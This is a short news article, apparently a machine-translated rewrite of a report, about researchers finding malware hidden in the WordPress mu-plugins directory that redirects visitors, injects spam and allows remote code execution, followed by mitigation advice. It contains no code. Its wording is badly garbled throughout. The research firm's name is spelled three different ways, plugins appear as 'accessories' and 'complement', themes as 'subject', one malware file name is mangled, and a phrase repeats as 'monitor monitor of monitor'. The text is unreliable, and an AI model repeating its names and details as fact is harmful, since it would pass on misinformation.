- Succuri’s researchers found malicious code hidden in the Mu-Plugins directory
- Malware redirected visitors, served spam and could even drop malware
- The sites were committed through vulnerable accessories, deficient administration passwords and more
Researchers have affirmed that a special directory in WordPress is abusing malicious code, warning that the code allows the threat actors to remain persistent on vulnerable websites, while executing an arbitrary code, redirecting people to malicious websites and showing spam and unwanted ads.
Succuri’s researchers discovered that threat actors hid the malicious code in “Mu-Plugins” (abbreviation for mandatory use accessories), a directory that stores accessories that are automatically activated and cannot be deactivated through the administration panel.
These are typically used for the essential functionality of the site, personalized modifications or performance optimizations that should always be executed.
Remote code execution risks
“This approach represents a worrying trend, since the MU-PLUGINS do not appear in the standard WordPress complement interface, which makes them less notable and easier to ignore during routine safety checks,” said Susturi researchers.
Until now, the analysis discovered three malicious code variants: Redirect.php (redirect visitors to malicious sites), Index.php (remote code execution and malware droppings) and personalized and personalized-js-aader.php (injects spam).
“The potential impact covers from minor inconveniences to serious safety violations, highlighting the importance of proactive security measures of the website,” said Suchuri.
By discussing how the sites could have been infected, the researchers said there were multiple ways to compromise a WordPress site. That includes exploiting a vulnerable complement or a subject, compromised administration credentials or abuse of poorly secured accommodation environments.
To mitigate the risk, the website administrators must scan their WP installation for malicious files (particularly in the MU-PLUGINS directory), verify if there are unauthorized administration accounts, audit installed accessories, update WordPress, accessories and topics, change all administration passwords and configure 2FA if possible and monitor monitor of monitor files configuring a safety complement.
WordPress is the best website builder in the world, promoting most websites on the Internet. As such, the platform is constantly under a flood of cyber attacks.
Through The hacker news
